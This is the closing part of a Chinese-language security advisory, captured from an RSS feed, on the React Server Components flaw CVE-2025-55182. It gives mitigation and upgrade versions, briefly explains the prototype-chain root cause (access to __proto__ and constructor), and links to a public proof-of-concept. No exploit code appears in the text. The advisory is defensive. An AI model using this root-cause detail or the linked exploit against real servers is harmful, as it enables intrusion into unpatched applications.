url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">03</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53uycm245v" style="font-size: 18px;" data-mpa-action-id="mf53uycw23jo" data-pm-slice="0 0 []">防护建议</span></p></div></div></div></div></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><h4 data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞缓解方式</span></span></span></h4></li></ul><p style="text-indent: 2em;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">如果应用完全不使用 RSC 或 Server Functions，就不受此漏洞影响</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">。</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">所以</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">如果</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">不</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">需要</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">RSC</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">的</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">话</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">，</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">把</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">功能</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">关掉</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">即可</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">。 </span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-indent: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">修复建议</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">升级 React </span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">到</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;"> 19.0.1 / 19.1.2 / 19.2.1</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">。</span></span></span></p><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">04</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53v17x21qs" style="font-size: 18px;" data-mpa-action-id="mf53v18b123g" data-pm-slice="0 0 []">洞见</span></p></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><h4 style="text-align:left;line-height:1.7;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:12pt;font-weight:bold;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf="">复现截图</span></span></h4></li></ul><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-backh="238" data-backw="550" data-imgfileid="100027333" data-ratio="0.43359375" data-s="300,640" type="block" data-type="png" data-w="1280" style="width:100%;" src="https://wechat2rss.xlab.app/img-proxy/?k=4c5493d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWWRkibE9RF6EYudF0rMZpxOQHB2dQZDqeic1whuUkIsONTcomspOEHz5Xv4DkwsXj8NEe2ia1iadIsNjA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;text-indent: 0px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞分析</span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 14px;">漏洞的核心问题在于：路径解析逻辑未通过 `hasOwnProperty` 限制可访问的属性范围，导致攻击者可以沿原型链访问任意属性，包括 `__proto__`、`constructor` 等敏感属性。具体分析请点击文末</span><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);font-weight: bold;">“阅读原文”</span><span textstyle="" style="font-size: 14px;">或复制链接访问：</span></span><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://keenlab.tencent.com/zh/" target="_blank">https://keenlab.tencent.com/zh/</a></span></span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;mf53qk7t1bas&#34;,&#34;data-pm-slice&#34;:&#34;4 3 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-mpa-template\&#34;:\&#34;t\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;,\&#34;data-mpa-action-id\&#34;:\&#34;malurube3fq\&#34;,\&#34;data-pm-slice\&#34;:\&#34;0 0 []\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;margin-top: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">2025/12/08/2025-CVE-2025-55182/</span></span></p><p style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mf53qk7t1bas" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;text-indent: 0px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞流程图</span></span></span></p></li></ul></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-backh="779" data-backw="550" data-imgfileid="100027334" data-ratio="1.4166666666666667" data-s="300,640" type="block" data-type="png" data-w="1200" style="width:100%;" src="https://wechat2rss.xlab.app/img-proxy/?k=9b1fe7bc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWWRkibE9RF6EYudF0rMZpxOQJEFic3R8OSxOd39ic2pJIKCmWxicbrTXjSz3qDIM4sL0LO6mL2DUhr05A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="malyjiiv20l2"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 12px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;justify-content: flex-start;align-items: center;padding: 20px 14px 0px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;align-items: flex-start;" data-mid="" mpa-from-tpl="t"><div style="transform: skew(30deg);display: flex;justify-content: center;align-items: center;align-items: flex-start;" data-mid="" mpa-from-tpl="t"><div style="background: #004af6;text-align: center;padding: 0px 8px;height: 28px;" data-mid="" mpa-from-tpl="t"><p style="transform: skew(-30deg);font-weight: bold;font-size: 18px;color: #004af6;line-height: 28px;text-align: center;-webkit-background-clip: text;background-image: linear-gradient(163deg, #ffffff 0%, #a5c0ff 100%);word-break: break-all;-webkit-text-fill-color: transparent;" data-mid="" mpa-is-content="t"><span leaf="">参考链接</span></p></div></div></div></div></div></div></div><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span style="text-decoration: none;font-size: 13px;" mpa-font-style="mf53onod1e3x"><span leaf="" mpa-font-style="mf53qk7919hs" style="font-size: 13px;">[1] </span></span></span><span style="font-size: 13px;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default" mpa-font-style="mf53qk7921kd"><span style="font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;mdeb7ech16ky&#34;,&#34;data-pm-slice&#34;:&#34;4 4 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-mpa-template\&#34;:\&#34;t\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;,\&#34;data-mpa-action-id\&#34;:\&#34;malurube3fq\&#34;,\&#34;data-pm-slice\&#34;:\&#34;0 0 []\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;&#34;,&#34;data-font-family&#34;:&#34;default&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Critical Security Vulnerability in React Server Components – React</span></span></span></p><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;"><span style="font-size: 13px;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default" mpa-font-style="mf53qk7921kd"><span style="font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);"><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components" target="_blank">https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</a></span></span></span></span></p><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 13px;">[2] Github | POC for CVE-2025-55182 that works on Next.js 16.0.6</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 82, 255);"><a href="https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3" target="_blank">https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3</a></span></span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://keenlab.tencent.com/zh/2025/12/08/2025-CVE-2025-55182/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=752be9a8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510986%26idx%3D1%26sn%3D424be0708a67b3ef8a802ca6bb5e4fdb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 09 Dec 2025 10:45:00 +0800</pubDate>
    </item>
    <item>
      <title>情报每周回顾 2025-12-08</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510979&amp;idx=1&amp;sn=45ad388685922de5e555ad65bb5cc401</link>
      <description></description>
